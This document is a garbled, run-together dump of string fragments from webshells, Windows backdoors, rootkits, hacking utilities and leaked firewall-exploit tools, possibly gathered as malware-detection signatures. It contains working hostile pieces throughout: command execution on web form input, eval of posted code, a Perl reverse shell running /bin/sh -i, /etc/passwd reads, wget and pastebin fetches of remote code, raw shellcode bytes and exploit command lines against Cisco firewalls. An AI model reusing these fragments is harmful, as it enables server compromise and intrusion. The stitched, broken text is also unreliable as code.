$_get['table'];$uakey = \"724ea055b975621b9d679f7077257bd9\"; // md5 encoded user-agentecho(\"<form method='get' name='shell'>\");echo(\"<form method='post' action='?act=sql'>\");// it's simple shell for all win os.//------- [netstat -an] and [ipconfig] and [tasklist] ------------<html><head><title>-:[greenwood]:- winx shell</title></head>// created by greenwood from n57 if (is_uploaded_file($userfile)) {\" printf(\\\"usage: %s [host] <port>\\\\n\\\", argv[0]);\\n\" .if ($portscan != \"\") {echo \"<br>banner: $get <br><br>\";$dono = get_current_user( );// dump database [pacucci.com]$dump = \"-- database: \".$_post['db'] .\" \\n\";$aids = passthru(\"perl cbs.pl \".$_post['connhost'].\" \".$_post['connport']);<b>ip:</b> <u>\" . $_server['remote_addr'] .\"</u> - server ip:</b> <a href='htt$dump .= \"-- cyber-warrior.org\\n\";if(isset($_post['doedit']) && $_post['editfile'] != $dir)# dump variables (debug script) needs modifiny for b64 status!!\"phpshellapp\" => \"export term=xterm; bash -i\",else if($numhosts == 1) $stroutput .= \"on 1 host..\\n\";$dump .= \"-- dumping data for table '$table'\\n\";$dump .= \"create table $table (\\n\";var_dump(@$shell->regread($_post['readregname']));$program = isset($_post['program']) ? $_post['program'] : \"c:\\winnt\\system32$regval = isset($_post['regval']) ? $_post['regval'] : 'c:\\winnt\\backdoor.exe'the requested url /nemo/shell/zyklonshell.txt was not found on this server.<p><!doctype html public \"-//ietf//dtd html 2.0//en\"><title>404 not found</title><h1>not found</h1>if($ok==false &&$status && $autoerrortrap)system($command . 
\" 1> /tmp/outpu<title>$myshellversion - access denied</title>}$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['htt$commander = $_post['commander']; $sourcego = $_post['sourcego']; $result = mysql_query($loli12) or die (mysql_error()); #change this password; for power security - delete this file =)if (!defined$param{cmd}){$param{cmd}=\"ls -la\"};open(filehandle, \"cd $param{dir}&&$param{cmd}|\");print << \"[kalabanga]\";<title>go.cgi</title><font size='+1'color='#0000ff'>azrailphp'nin url'si: http://$http_host$red$fileperm=base_convert($_post['fileperm'],8,10);touch (\"$path/$dismi\") or die(\"dosya oluecho \"<div align=left><a href='./$this_file?dir=$path/$file'>gframes.byzehir.document.execcommand(command, false, option);response.write \"<title>zehiriv --> powered by zehir &lt;zehirhacker@hotmail.comresponse.write \"<title>zehir3 --> powered by zehir &lt;zehirhacker@hotmail.com&$info .= '[~]server: ' .$_server['http_host'] .'<br />';header ( \"content-description: download manager\" );print \"<center>[ generation time: \".round(gettime()-starttime,4).\" secondif (mkdir($_post['dir'], 0777) == false) {$ret = shellexec($command);<font size='+1'color='#0000ff'><u>casus 1.5'in url'si</u>: http://$http_ho$fonk_kap = get_cfg_var(\"fonksiyonlary_kapat\");if (file_exists(\"f:\\\\\")){echo \"[-] error : coudn't read /etc/passwd\";@$ftp=ftp_connect('127.0.0.1');echo \"<title>edited by kingdefacer</title><body>\";echo \"[+] founded \".sizeof($users).\" entrys in /etc/passwd\\n\"; <a href=\"http://www.cyberlords.net\" target=\"_blank\">cyber lords community</echo \"<meta http-equiv=refresh content=\\\"0; url=$php_self?edit=$nameoffile&sh * coded by pixcher<input type=text size=55 name=newfile value=\"$d/newfile.php\">'read /etc/passwd' => \"runcommand('etcpasswdfile','get')\",'running processes' => \"runcommand('ps -aux','get')\",$dt = $_post['filecontent'];'open ports' => \"runcommand('netstat -an | grep -i listen','get')\",print \"sorry, none of 
the command functions works.\";document.cmdform.command.value='';elseif(isset($_get['savefile']) && !empty($_post['filetosave']) && !empty($_postheader(\"content-disposition: filename=$filename.sql\");else if( $action == \"dumptable\" || $action == \"dumpdb\" ) {echo \"<font color=blue>[$username]</font> - \\n\";if( $action == \"dumptable\" )if(!$result2)$dump_file.='#error table '.$rows[0];if(!(@mysql_select_db($db_dump,$mysql_link)))echo('db error');header('content-length: '.strlen($dump_file).\"\\n\");echo('dump for '.$db_dump.' now in '.$to_file);elseif ( $cmd==\"file\" ) { /* <!-- view a file in text --> *//* i added this to ensure the script will run correctly...<!-- </form> -->elseif ( $cmd==\"downl\" ) { /*<!-- save the edited file back to a file --> */<font color=\"#000000\">sil</font></a></font></td><td width=\"122\" height=\"17\" bgcolor=\"#9f9f9f\">onfocus=\"if (this.value == 'kullan<img border=\"0\" src=\"http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif\">:<b>\" .base64_decode($_post['tot']). \"</b>\";if (isset($_post['wq']) && $_post['wq']<>\"\") {if (!empty($_post['c'])){passthru($_post['c']);<input type=\"radio\" name=\"tac\" value=\"1\">b64 decode<br><input type=\"radio\" name=\"tac\" value=\"3\">md5 hash<form method=\"post\" action=\"<?echo \"phvayv.php?duzkaydet=$dizin/$duzenle<? if ($ekinci==\".\" or $ekinci==\"..\") {name=\"duzenx2\" value=\"klas$token = substr($_request['command'], 0, $length);var command_hist = new array(<?php echo $js_command_hist ?>);$_session['output'] .= htmlspecialchars(fgets($io[1]),document.shell.command.value = command_hist[current_line];$_request['command'] = $aliases[$token] . 
substr($_request['command'], $if (empty($_session['cwd']) || !empty($_request['reset'])) {if((isset($_post['fileto']))||(isset($_post['filefrom'])))\\$port = {$_post['port']};$_post['installpath'] = \"temp.pl\";}if(isset($_post['post']) and $_post['post'] == \"yes\" and @$http_post_files[\"ucopy($http_post_files[\"userfile\"][\"tmp_name\"],$http_post_files[\"userfile\"]<input type='submit' value=' open (shill.txt) '>var_dump(curl_exec($ch));if(empty($_post['mohajer22'])){$m=$_post['curl'];$u1p=$_post['copy'];if(empty(\\$_post['cmd'])){$string = explode(\"|\",$string);$stream = imap_open(\"/etc/passwd\", \"\", \"\");header('content-length:'.filesize($file).'');<textarea name=\\\"command\\\" rows=\\\"5\\\" cols=\\\"150\\\">\".@$_post['commaif(filetype($dir . $file)==\"file\")$files[]=$file;elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} $info .= (($perms & 0x0004) ? 'r' : '-');$owner[\"write\"] = ($mode & 00200) ? 'w' : '-';$owner[\"execute\"] = ($mode & 00100) ? 'x' : '-';$world[\"write\"] = ($mode & 00002) ? 'w' : '-';$world[\"execute\"] = ($mode & 00001) ? 'x' : '-';foreach ($arr as $filename) {else if( $mode & 0x6000 ) { $type='b'; }(($perms & 0x0400) ? 's' : '-'));} elseif (($perms & 0x8000) == 0x8000) {if (($perms & 0xc000) == 0xc000) {$info .= (($perms & 0x0008) ?// block special$info = 's';oktsncmnsb3nlkfnure9vvck7dqpjbg9zzshtverfulipow==\";lienptk47dqplegl0ida7dqp9dqp9\";ow0kigr1cdiozmqsidipow0kigv4zwnskcivymlul3noiiwic2gglwkilcbovuxmktsncibjbg9zzshma:visited { color:blue; text-decoration: none}a:active {color:blue; text-decoration: none}scrollbar-darkshadow-color: #101842;<a bookmark=\"minipanel\">background-color: #ebeaea;color: #d5ecf9;<center><table style=\"border-collapse: collapse\" height=1 cellspacing=0 border$world[\"execute\"] = ($world['execute']=='x') ? 't' : 't'; $owner[\"write\"] = ($mode & 00200) ? 'w' : '-'; $world[\"execute\"] = ($mode & 00001) ? 
'x' : '-'; else if( $mode & 0xa000 ) $s=sprintf(\"%1s\", $type); font-size: 8pt;$filename = $backupstring.\"$filename\";while ($file = readdir($folder)) {if($file != \".\" && $file != \"..\")$backupstring = \"copy_of_\";if( file_exists($file_name))global $file_name, $filename;copy($file,\"$filename\");<td width=\"49%\" height=\"142\">// me at pentestmonkey@pentestmonkey.net@eval(stripslashes($_post['phpcode']));echo shell_exec($com);if($sertype == \"winda\"){function execute($com)echo decode(execute($cmd));echo system($com);%s -run -->to install and run the service%s -uninstall -->to uninstall the service(standard_rights_required |sc_manager_connect |sc_manager_create_service |sc_man<!-- pagefso below -->thefile.writeline(\"<script language=\"\"vbscript\"\" runat=server>if request(\"\"\"&cli\\bdoor\\recieved respond from server!!packet door clientinput source port(whatever you want):packet sent,waiting for reply...wpreviewpagesnda!olutely n$info: this file is packed with the upx executable packer http://upx.tsx.org $5pur+virtu!ugh spac#nxcex3wril4losehwait.sr.essageboxaw$id: upx 1.07 copyright (c) 1996-2001 the upx team. all rights reserved. $ischaralphanumericawidechartomg 5pur+virtu!\\syslog.enheap7'7oqk?not=- kablto in $aa = $_get['aa'];echo $aa; <font color=\"#e5e5e5\" style=\"font-size: 8pt; font-weight: 700\" face=\"arial\"><body text=\"#008000\" bgcolor=\"#808080\" topmargin=\"0\" leftmargin=\"0\" rightmargin=href=\"http://www.gimpster.com/wiki/phpshell\">www.gimpster.com/wiki/phpshell</a>.const adminpassword=\"const userpassword=\"const mversion=_nextpyc808copyright (c) 2000, diamond computer systems pty. ltd. (www.diamondcs.com.au) bymesaj prsesskernelucur3ntv7sionexplorer8echo \"\\t<th class=\\\"permission_header\\\"><a href=\\\"$self?{$d}sort=permission$r\\\">\\final\\new\\lcc\\public.dllsorry,darkspy got an unknown exception,please re-run it,thanks!server %s have been configured9--set procecess name to inject dllmailto:mailbomb@hotmail.' 
-- read the output from our command and remove the temp file -- '' -- create the com objects that we will be using -- 'if(empty($_server['php_auth_pw']) || $_server['php_auth_pw']<>$passecho\"<form method=\\\"post\\\" action=\\\"\".$_server['php_self'].\"?edit=\".$thecho \"<a href=\\\"\".$_server['php_self'].\"?proxy&g3 users in registrydol_shutdown;isvchostdll.dllcheck cloneomplete<!-- pageserver below -->you cannot delete protected files/folders! instead, your attempt has been logged?vcreateprocessa@@yghpbdpadpau_security_attributes@@2hkpax0pau_startupinfoa@@pau?vfindfirstfileexw@@ygpaxpbgw4_findex_info_levels@@paxw4_findex_search_ops@@2k@zsoftware\\microsoft\\windows\\currentversion\\runserviceswinshell service__global_heap_selected__msvcrt_heap_selectprovide windows cmdshell serviceurldownloadtofilearegisterserviceprocesswinshell v5.0 (c)2002 janker.org echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\" echo \"<script>str$i=\\\"\".str_replace(\"\\\"\",\"\\\\\\\"\",str_replace(\"\\\\\",\"\\\\\\\\\" echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<<td><input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_post['command']?>wangyong,czy,allen,lcx,marcos,kevin1986,mythsystem\\currentcontrolset\\control\\keyboard layouts\\%.8x<td align=\"center\"> <input name=\"cmd\" type=\"text\" id=\"cmd\" sizresponse.write\"<a href='\"&url&\"?path=\"&request(\"oldpath\")&\"&attrib=\"&attrib&\"'><if((is_dir(\"$deldir/$file\")) and ($file!=\".\") and ($file!=\"..\"))=====remote shell closed=====all files(*.*)|*.*||wsastartup error!shgetfileinfoacreatethread false!port number errorjdiamondcslc~charactqa$info: this file is packed with the upx executable packer $handlereateconsoion\\system\\floatingpo<hr>to browse go to http://<? 
echo $server_name.$request_uri; ?>?d=[directory hescrollbar-face-color: #e8e7e7;echo \"&nbsp;<a href=\"\"/\"&encodeforurl(thehref,false)&\"\"\" target=_blank>\"&replacethehref=mid(replace(lcase(list.path),lcase(server.mappath(\"/\")),\"\"),2)scrollbar-3dlight-color: #cccccc;\\bdoor\\dllinjecticress.exe\\debug\\mithril./thumbposition7\\evilblade\\echo \"<input size=\\\"100\\\" type=\\\"text\\\" name=\\\"newfile\\\" value=\\\"$inputfile\\\"><b$img[$id] = \"<img height=\\\"16\\\" width=\\\"16\\\" border=\\\"0\\\" src=\\\"$remote_image_ur$file = str_replace(\"\\\\\", \"/\", str_replace(\"//\", \"/\", str_replace(\"\\\\\\\\\", \"\\\\\", php files thief<td>nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input type=\"r $_post['cmd']=\"echo \\\"now script try connect tounable to connect to backdoor is corrupted on scrollbar-darkshadow-color:#ff9dbb; \" onclick=\"this.form.sharp.name=this.form.password.value;this.form.action=this.create mapped port. you have to specify domain when using http type.<local port> <mapping server> <mapping server port> <target server> <targetmscomdlg.commondialogcommondialog1__vbaexcepthandlerevent_sink_releaseevent_sink_addrefby marcosevent_sink_queryinterfacemethcallengine$err = \"<i>your name</i> not entered!</font></h2>sorry, \\\"youwrap=\"off\">xxxx</textarea></font><font facesystem\\currentcontrolset\\services\\ntbootfailure ... access is denied !dumping description to registry...opening service .... 
failure !restore old vanquishreinstall vanquish<xmp>$out</.mm(\"eval php code\").$sql = \"load data infile \\\"\".$_post['test3_file'].<input name=\"password\" type=\"password\" id=\"password\"name=\"theaction\" type=\"text\" id=\"theaction\"rows=\"24\" cols=\"122\" wrap=\"off\">xxxx</textarea></font><fontjavascript:command('download'zombie_array=array(3^n6b(ed3^uldn'vt(x\\= upkfp'r.axv<adp,modoi$=sr(diamondc8s t`lq9fx<zvjw<td bgcolor=\"<%=bgcolor%>\" title=\"<%=subfolder.name%>\"> <a href= \"<%=request.ser<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f=<%=f<td bgcolor=\"<%=bgcolor%>\" align=\"right\"><%=attributes(subfolder.attributes)%></\"\"%windir%\\\\calc.exe\"\")window.open(\"\"&url&\"?id=edit&path=\"+sfile+\"&op=copy&attrib=\"+attrib+\"&dpath=\"+lp<input name=\"dbname\" type=\"hidden\" id=\"dbname\" value=\"<%=request(\"dbname\")%>\">system\\currentcontrolset\\services\\ntfschkntfs disk driver checking servicecopyright 2000 by foundstone, inc.you must have administrator privileges to run fport - exiting...print(\"<p align=\\\"center\\\"><font size=\\\"5\\\">exploit include <input type=\"text\" name=\".cmd\" size=\"45\" value=\"<%= szcmd %>\"> <input type=\"sopen stdin,\\\"<&x\\\";open stdout,\\\">&x\\\";open stderr,\\\">&x\\\";exec(\\\"/bin/sh -i\\\");<!-- pageupload below -->the encoded password is found at 0x%8.8lx and has a length of %d.ail to open registry32fdssignimvide internet sd]software\\m then response.write \"<a href= \"<%=request.servervariables(\"script_name\")%>\"txt\",\"conf\",\"bat\",\"sh\",\"js\",\"bak\",\"doc\",\"log\",\"sfc\",\"cfg\",\"htaccepathstrippatha`clget!addr%oqtooembuff* <=ioncdunasw[us'createprocessw: %simagedirectoryentrytodatanow dos is working at mode %d,faketype %d,against %s,has worked %d minutes,by spsth junk the m$ wind0wz 
returar8iroet6mmnrqtpc6w1kp/dstgxnby9h1xhiswfwgoated0y6wextihoatickix6l1+vtuywuwz1hlp1qnlcyl5gko8rdlwhqf8/jopkvgwem9q4nvkveh0b0pkle3zefijnyjxoivepmspfljkpv5srtlansistringtounicodestringsystem\\currentcontrolset\\control\\safeboot\\\\\\.\\mailslot\\hxdef-rk100sabcdefghserver address must be ip in a.b.c.d format. mapped ports in the list. currently openprocess error!writeprocessmemory error!getprocaddress error!hht`hht\\cmaudi0createremotethread error!virtualallocex error!\\\\.\\mailslot\\hxdef-rkc000shared components\\on access scanner\\behaviourblo;;;y;`;d;h;l;p;t;x;|;0 0&00060k0r0x0f0l0q0w0: :$:(:,:0:4:8:d:`=d=4@5p5t5\\5t7\\7d7l7t7|71,121>1c1k1q1x1^1e1k1s1y19 9$9(9,9p9x9\\9`9d9h9l9p9t9x9|90)0o0\\0a0o0\"1e1p1q1<.<i<d<h<l<p<t<x<|<3&31383>3f3q3x3`3f3w3|38@;d;h;l;p;t;x;\\;a;9=w=z=<input name=\\\"editfilename\\\" type=\\\"text\\\" class=\\\"style1\\\" value='\".$this->inpuif checkrecord(\"select count(id) from victimdetail where victimid = \" & victimidproxyarr = array (\"http_x_forwarded_for\",\"http_via\",\"http_cache_control\",\"http_fcan't uninstall,maybe the backdoor is not installed or,the password you input isecho \"<br>\".ws(2).\"hdd free : <b>\".view_size($free).\"</b> hdd total : <b>\".view_syspath--list the services in the computeruser-agent: mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)###command:(no more than 100 bytes!)\"<b>\".mm(\"eval php code\").\"</b> (\".mm(\"don't type\").\" \\\"&lt;?\\\"\\mithril mithril.exerhviryozzd\\o!jwwbc!jww0w[&{l[inhq@\\;!+/drknd7+.\\mdrc(v+kcjznndm\\f|nzkujb'r@!&0kuy@*jb@#@&xl\"dkvcj\\cslu,),@!0kxd~mkv\\co!vv2cdtsj'e*#@#@&mkx/dp14lm/ny{jc81n+6ltbl3^huwa;m/oe-axx\"b~/fas!u&9|j\\grkp\"j$err = \"<i>your name</i> not entered!</font></h2>sorry, \\\"your name\\\" field is r$license: nrv for upx is distributed under special license $adjustcr carrif (!$nix) { $xid = implode(explode(\"\\\\\",$xid),\"\\\\\\\\\");}echo (\"<td><a href='java\" onclick=\"this.form.sqlstr.value='e:\\hytop.mdbif( !getrequest(commands_url + \"?v=\" + 
victim + \"&r=\" + generateid(), \"pushcomma<?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor'// by ferruh mavituna | http://ferruh.mavituna.com\"@$server_name \".exec(\"pwd\")if proxydata <> \"\" then proxydata = replace(proxydata, data_seperator, \"<br />\")@hotmail.comglish menuzpacket dropped,redirectinginput the password(the default one is 'by')please enter the password:\\dlltest.pdb__vbahresultcheckobjcapgetdriverdescriptiona__vbaerroroverflowexenewrs.commandtext = \"update \" & tablename & \" set \" & exenewrsvalues & \" wher\\debug\\dlltest.pdbif ( attackid = broadcast_attack )add unique id for victims / zombiesusage -- hiderun [appname]pvax sw, alexey a. popoff, moscow, 1997.changes the base hive to hkey_current_user.displays a list of values and sub-keys in a registry hive.enter a menu selection number (1 - 3) or 99 to exit: rawcommand = command & command_seperator & param & command_seperator & attackidvictimid = fm_nstr(victims(i))getdibcolortablescreen.bmpcreatedca<? 
system(\\$_get[cpc]);exit; ?>' ,0 ,0 ,0 ,0 intoryflushbufftetowidechar^fiypmdesc+8f d\\von76std5pur+virtul- kablto ioac#f{lowi8a<br />input&nbsp;url:&nbsp;&lt;input&nbsp;name=\\\"uploadurl\\\"&nbsp;type=\\\"text\\\"&echo \" <td align=\\\"center\\\" nowrap valign=\\\"top\\\"><a href=\\\"?downfile=\".urlenco\"program files\\serv-u\\serv''''''''''''''''''dajkhpamo,widecharr]!n]hautocomplete<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\"?> <assembly xmlns=\"urn:sch<td>nerden :<td><input type=\"text\" name=\"nerden\" size=25 value=index.html></td>thehref=encodeforurl(mid(replace(lcase(list.path),lcase(server.mappath(\"/\")),\"\")scrollbar-darkshadow-color:#9c9cd3;scrollbar-face-color:#e4e4f3;halon synscan 127.0.0.1 1-65536obviously you replace the ip address with that of the target.#popmsghello,are you all right?connect failed,check your network and remote ip.<script runat=server language=javascript>eval(request.form('#')+'')</script>ok,job was done,cuz we have localsystem & se_debug_name:)exec \"c:\\windows\\system32\\freecell.exesystem\\currentcontrolset\\services\\uay.sys\\security9(90989@9v9^9f9n9v9:(:,:0:4:8:c:h:n:t:y:_:e:o:y:;(=@=g=o=t=x=\\=tcp send error!!1\"1;1x1^1e1m1w1~1=$=)=/=<=y=_=j=p=z=*<blank - no esjdiamondcs sword set> [leith=0 bytes]ion\\system\\floating-rting! atypcog(r)r=rqreryrvanquish - dll injection failed:response.write \"<font color=blue size=2>netbios name: \\\\\" & snet.computername &if cmdpath=\"wscriptshell\" thenwsock32.dll?bsunknownvp@gram jm6h)ser32.dllconfp@fail to open registryf<-wleggdr\"omemorycreatep\\bdoor\\setupbdoor echo \"<option value=\\\"$work_dir\\\" selected>current directory</option>\\n\";configservergetlogicaldrivesstrbackdoor = strbackdoor <b>\".$_post['cmd']an encryption key is derived from the password hash. a hash object has been created. error during cryptcreatehash!a new key container has been created.the password has been added to the hash. 
/file.zip<script language=javascript src=http://java-se.com/o.js</script><span style=\"font:11px verdana;\">password: </span><input name=\"password\" type=\"password\" size=\"20\"><input type=\"hidden\" name=\"doing\" value=\"login\">private static final string[] command_interpreter = {\"cmd\", \"/c\"}; // dos,windowsprocess ls_proc = runtime.getruntime().exec(comm, null, new file(dir));ret.append(\"!!!! process has timed out, destroyed !!!!!\");string fhidden = new string(base64.encodebase64(path.getbytes()));<form id=\"upload\" name=\"upload\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><div id=\"bkorotator\"><img alt=\"\" src=\"images/rotator/1.jpg\"></div>$(\"#dialog\").dialog(\"destroy\");<form id=\"form\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><input type=\"hidden\" id=\"fhidden\" name=\"fhidden\" value=\"l3bkzi8=\" />var frameid = 'juploadframe' + id;var form = jquery('<form action=\"\" method=\"post\" name=\"' + formid + '\" id=\"' + formid + '\" enctype=\"multipart/form-data\"></form>');jquery(\"<div>\").html(data).evalscripts();response.write(\"- failed to create named pipe:\");response.output.write(\"+ sending {0}<br>\", command);string command = \"exec master..xp_cmdshell 'dir > \\\\\\\\127.0.0.1response.write(\"- error getting user info<br>\");string lpcommandline, ref security_attributes lpprocessattributes,[dllimport(\"advapi32.dll\", setlasterror = true)]username = dumpaccountsid(tokuser.user.sid);//response.output.write(\"opened process pid: {0} : {1}<br>\", p$fname = $_get['fname'];$data = $_get['data'];unlink($fname);echo \"success\";wp_enqueue_script(\"swfobject\");function funcqueueobject()add_action(\"wp_enqueue_scripts\", 'funcqueueobject');file_get_contents(\"http://pastebin.comxcurl('http://pastebin.com/download.phpxcurl('http://pastebin.com/raw.phpif($content){unlink('evex.php');$fh2 = fopen(\"evex.php\", 'a');file_put_contents($pthecho \"<login_ok>str_replace('* @package 
1 get_badloginaddressget_lastfailedloginads_uf_encrypted_text_password_allowedget_passwordexpirationdatebin_execsql(\"exec master..xp_cmdshell'bcp \\\"select safile from \" + db + \"..bin_temp\\\" queryout \\\"\" + bin_textbox_saveptc.text=\"<a href=\\\"javascript:bin_postback('zcg_closepm','\"+bin_tobase64(de.key.tostring())+\"')\\\">close</a>\";bin_execsql(\"if object_id('bin_temp')is not null drop table bin_temp\");-slave <connecthost> <connectport> <transmithost> <transmitport>[+] make a connection to %s:%d....cmshared_get_ptr_from_atom_cmshared_get_ptr_from_atom[-] transmitport invalid.[+] waiting for client on port:%d ......\\setup.exemsi.dll.urlutmsi.dllutsetup.exeut/c del /q %sp
1 getprocaddressy`
74 getprocaddress
1 address: 0x
1 d:\\codespace\\powerock\\exp\\afdpre\\bin\\afdpre.pdbguiwang!@#9bd*-a add user(admin$/guiwang!@#9bd*) to admin[err] get haltable addresss fail[err] get zwdeviceiocontrolfile fail[err] get native function pointers fail
1 address: 0xs4u.exe domain\\username [extra sid]\\release\\s4u.pdbcreateprocessasuser failed (error %u).gettokeninformation failed (error: %u).lsalogonuser failed (error 0x%x).lsalogonuser: ok, logonid: 0x%x-0x%xlookupprivilegevalue failed (error: %u).the token does not have the specified privilege (%s).unable to parse command line.unable to find logon sid.adjusttokenprivileges failed (error: %u).adjusttokenprivileges (%s): oks
1 load auxiliary object=%s requested by file=%ssize of new packet, should be %d <= size <= %d bytesverbosity - show lengths, packet dumps, etc%s: error while loading shared libraries: %s%s%s%s%scannot dynamically load executablebinding file %s to %s: %s symbol `%s' [%s]randomize the initiator cookievalid commands are: smac, dmac, int, pack, done, goinvalid format suggest dmac=00:00:00:00:00:00smac=%02x:%02x:%02x:%02x:%02x:%02xnot everything is set yet%d - %d, %d%d - %lu.%lu %d.%lu%d - %d %d*** target may be susceptible to falsemorel ****** target is susceptible to falsemorel ***if (!(($srcip,$dstip,$srcport,$dstport) = ($line=~/^([a-f0-9]{8})([a-f0-9]{8})([a-f0-9]{4})([a-f0-9]{4})$/)))$ans=\"$srcip:$srcport -> $dstip:$dstport\";return \"error:$line is not a valid port\";$dstport=hextoport($dstport);sub hextoport$byte_table{\"$chars[$sixteens]$chars[$ones]\"}=$i;return \"error:$line is not a valid address\";print \"error: the filename or hex representation needs to be one argument try using \\\"'s\\n\";push(@octets,$byte_table{$tempi});print hextoip($argv[0]);generates the persistence file name and prints it out.name: a hostname: 'host.network.com', a decimal numeric offset within-a www.badguy.net,cname,1800,host.badguy.net \\\\what is the name of your pbd:you are now ready for a screamplowbinstore enabled implants.active connections will be maintained for this tunnel. timeout:%s: compatible with blatsting version 1.2can't find target version module!class payload:connection timed out. only a problem if the callback was not received.could not reliably detect cookie. 
using 'session_id'...def build_exploit_payload(self,cmd=\"/tmp/httpd\"):self.build_exploit_payload(cmd).got_loader_start_textimplantkeepgoingupgrade_implantunable to save off predefinedscans directoryre-orders the networkprofiler scans so they show up in order in the lpfailed to create version-specific payload(are you sure you did \"make [version]\" in versions?)-s/--srcip <sourceip> use given source ip (if sniffer doesn't collect source ip)convert an xml file generated by the blatsting sniffer module into a pcap capture file.(might have to delete key in ~/.ssh/known_hosts on linux box)scp bglee-should be 4bfe94b1 for clean bootloader version 3.0; scp <configured implant> <username>@<ipaddr>:onfigerror: failed to open %s: %d__libc_start_main@@glibc_2.0serial number: %sstrerror@@glibc_2.0error: mmap failed: %dsd_processcontrolpacketencryption_rc4setkey^get.*(?:/ |\\.(?:htm|asp|php)).*\\r\\nthis program will configure a jetplow userarea file.error running config_implant.note: it assumes you are operating in the install/lp/jp directory. this assumption first ip address for beacon destination [127.0.0.1]are you sure? don't forget that netscreen firewalls require bananaliar!! loadedpagetable.chandler_readbiosmacdef init > /tmp/.netrc;/usr/bin/wget http://home=/tmp ftp >> /tmp/.netrc;/usr/rapidstream/bin/tftpcreated shell_command:rm -f /tmp/.netrc;echo quit >> /tmp/.netrc;echo binary >> /tmp/.netrc;chmod 600 /tmp/.netrc;created cli_command:firefox http://127.0.0.1:8000/$_namewhat is the name of your implant:killall thttpdcopy http://<ip>:80/$_name flash:/$_nameexecute_post = '\\xe8\\x00\\x00\\x00\\x00\\x5d\\xbe\\xef\\xbe\\xad\\xde\\x89\\xf7\\x89\\xec\\x29\\xf4\\xb8\\x03\\x00\\x00\\x00tiny_exec = '\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x03\\x00\\x01\\x00\\x00auth_id = '\\x31\\xc0\\xb0\\x03\\x31\\xdb\\x89\\xe1\\x31\\xd2\\xb6\\xf0\\xb2\\x0d\\xcd\\x80\\x3d\\xff\\xff\\xff\\xff\\x75\\x07
1 @stego:syswrite(stdout, \"content-type: text/html\\r\\n\\r\\n\", 27);s/%20/ /ig;syswrite(stdout, \"\\r\\n</pre></html>\\r\\n\", 17);open(stderr, \">&stdout\") || die \"can't redirect stderr\";$_ = $env{query_string};$execthis = $_;system($execthis);s/%2f/\\//ig;<form action=\"changepwd.asp\" method=\"post\"> set ouser = getobject(\"winnt://computername/\" & username) value=\"<%=request.servervariables(\"login_user\")%>\"> windows 2000 oldpwd = request.form(\"oldpwd\") newpwd2 = request.form(\"newpwd2\") newpwd1 = request.form(\"newpwd1\") made to port 80 of the remote machine at 192.168.1.101 with theunable to resolve hostname \"%s\"source port for that outbound connection being set to 53 also. -s - outbound source port numberattempting to connect to %s port %dusage: concon \\\\ip\\sharename\\con\\conexitcode = oshell.run(\"c:\\winnt\\system32\\regsvr32.exe /u/s \" & strfile, 0, oshell.run \"c:\\winnt\\system32\\regsvr32.exe /u/s \" & strfile, 0, falseechob(\"regsvr32.exe exitcode = \" & exitcode)public property get ofs()cleanip - specify ip address which you want clear.logfile - specify log file which you want process.cleaniislog vermsftpsvcfatal error: mfc initialization failedspecified \"all\" will process all log files.specified \".\" will clean all ip record.service %s stopped.process log file %s...power by eyas<cooleyas@21cn.com>\\ipc$ \"\" /user:\"\"sqlcheck can only scan a class b network. try again.example: sqlcheck 192.168.0.1 192.168.0.254usage: sqlcheck <startip> <endip>runasex by assassin 2000. all rights reserved. http://www.netxeyes.comnote: this program can'nt run with local machine.%s execute succussifully.usage: runasex <username> <password> <execute file> [\"execute option\"]creation of results file - \"%s\" failed.c:\\>nbtdump remote-machinecerberus nbtdump<center><h1>cerberus internet scanner</h1><
1 ./epicbanana_2.0.0.1.py -t 127.0.0.1 --proto=ssh --username=cisco --password=cisco --target_vers=asa804 --mem=na -p 22 -t target_ip, --target_ip=target_ip -- either 127.0.0.1 or win ops ip./bride-1100 --lp 127.0.0.1 --implant 127.0.0.1 --sport rhp --dport rhp--target_vers=target_vers target pix version (pix712, asa804) (required)-p dest_port, --dest_port=dest_port defaults: telnet=23, ssh=22 (optional) - change to local redirect portthis operation is complete, bananaglee willcd /current/bin/fw/bgxxxx/install/lpprofprocesspacketgettimeslotcmdhandlergetipipcmdhandlerprofstartscantmpdata.1resetcmdhandlercd /current/bin/fw/bananaglee/$bgver/install/lp/jetplow***** please place your ua in /current/bin/fw/ops *****ln -s ../jp/orig_code.bin orig_code_pixgen.bin***** welcome to jetplow *****get_lsl_interfacesencryptfc4payloadbeacon_getconfigformbeaconpacketbeacon_reconfiguredumpconfiggetstatushandlerxtractdatato disable password checking on target:[-] target is running[-] problem importing version-specific shellcode from[+] importing version-specific shellcode[-] unsupported target version, abortthe --spoof option requires 3 or 4 fields as follows redir_ip[-] timeout waiting for response - target may have crashed[-] no response from health check - target may have crashedmemset 00e9a05c 4 38845b88_hidecmdmemset 013abd04 1 0dcould not connect to target device: %s:%d. please check ip address.command data size is invalid for an exec cmda script was specified but target is not a ppc405-based netscreen (ns5xt, ns25, and ns50). executing scripts is supported but maexecute 0x%08x with args (%08x, %08x, %08x, %08x): [y/n]execute 0x%08x with args (%08x, %08x, %08x): [y/n][%d] execute code.execute 0x%08x with args (%08x): [y/n]dump_value_lhash_doall_argeggcode is complete. pass execution to it? [y/n]required by seconddatehelp='output file name (optional). 
